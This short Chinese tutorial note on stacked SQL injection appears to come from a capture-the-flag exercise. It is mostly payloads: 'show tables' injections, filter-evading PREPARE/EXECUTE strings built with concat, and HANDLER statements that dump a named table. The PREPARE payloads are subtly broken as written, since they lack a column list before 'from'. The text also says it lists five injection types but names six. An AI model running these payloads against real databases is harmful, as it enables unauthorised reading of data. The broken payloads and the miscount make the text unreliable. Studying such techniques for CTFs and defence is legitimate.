在SQL语句中;是语句的结束,对于存在堆叠注入的数据库来说,就可以通过在;结束后继续写入查询语句,数据库也会返回相关的查询结果。
SQL注入常见五种注入类型:
- union 联合注入
- bool型盲注
- 延时注入
- 报错注入
- 堆叠注入
- 宽字节注入
例如:
1’;show tables;
1’;show columns;
prepare 预处理语句:
1’;PREPARE st from concat(‘s’,’elect’, ‘from1919810931114514 ‘);EXECUTE st;#
也可以写成:
1’;SET @sql=concat(‘sel’,’ect from1919810931114514;’);prepare st from @sql;EXECUTE st;#
handler 方法:
1’;handler 1919810931114514 open;handler 1919810931114514 read first;handler 1919810931114514 close;#
open进入 1919810931114514 表,read读取这个表中内容,最后close关闭这个表。
若有收获,就点个赞吧
0 人点赞
